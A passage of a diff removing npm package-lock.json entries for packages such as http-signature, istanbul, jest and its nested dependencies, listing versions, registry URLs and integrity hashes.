"sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "ignore": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-4.0.6.tgz", - "integrity": "sha512-cyFDKrqc/YdcWFniJhzI42+AzS+gNwmUzOSFcRCQYwySuBBBy/KjuxWLZ/FHEH6Moq1NizMOBWyTcv8O4OZIMg==", - "dev": true, - "peer": true - }, - "import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "requires": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - } - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha1-d8mYQFJ6qOyxqLppe4BkWnqSap0=", - "dev": true - }, - "is-core-module": { - "version": "2.13.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", - "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", - "dev": true, - "requires": { - "hasown": "^2.0.0" - } - }, - "is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=", - "dev": true, - "peer": true - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-glob": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.1.tgz", - "integrity": "sha512-5G0tKtBTFImOqDnLB2hG6Bp2qcKEFduo4tZu9MT/H6NQv/ghhy30o55ufafxJ/LdH79LLs2Kfrn85TLKyA7BUg==", - "dev": true, - "peer": true, - "requires": { - "is-extglob": "^2.1.1" - } - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.2.tgz", - "integrity": "sha512-1WUsZ9R1lA0HtBSohTkm39WTPlNKSJ5iFk7UwqXkBLoHQT+hfqPsfsTDVuZdKGaBwn7din9bS7SsnoAr943hvw==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jackspeak": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-2.3.6.tgz", - "integrity": "sha512-N3yCS/NegsOBokc8GAdM8UcmfsKiSS8cipheD/nivzr700H+nsMOxJjQnvwOcRYVuFkdH0wGUvW2WbXGmrZGbQ==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, - "jake": { - "version": "10.9.1", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.1.tgz", - "integrity": "sha512-61btcOHNnLnsOdtLgA5efqQWjnSi/vow5HbI7HMdKKWqvrKR1bLK3BPlJn9gcSaP2ewuamUSMB5XEy76KUIS2w==", - "dev": true, - "requires": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.18.6.tgz", - "integrity": "sha512-TDCmlK5eOvH+eH7cdAFlNXeVJqWIQ7gW9tY1GJIpUtFb6CmjVyq2VM3u71bOyR8CRihcCgMUYoDNyLXao3+70Q==", - "dev": true, - "requires": { - "@babel/highlight": "^7.18.6" - } - } - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - }, - "@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - } - }, - "@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - } - }, - "@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - } - }, - "@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2" - } - }, - "@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - } - }, - "@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinclair/typebox": "^0.24.1" - } - }, - "@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - } - }, - "@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": 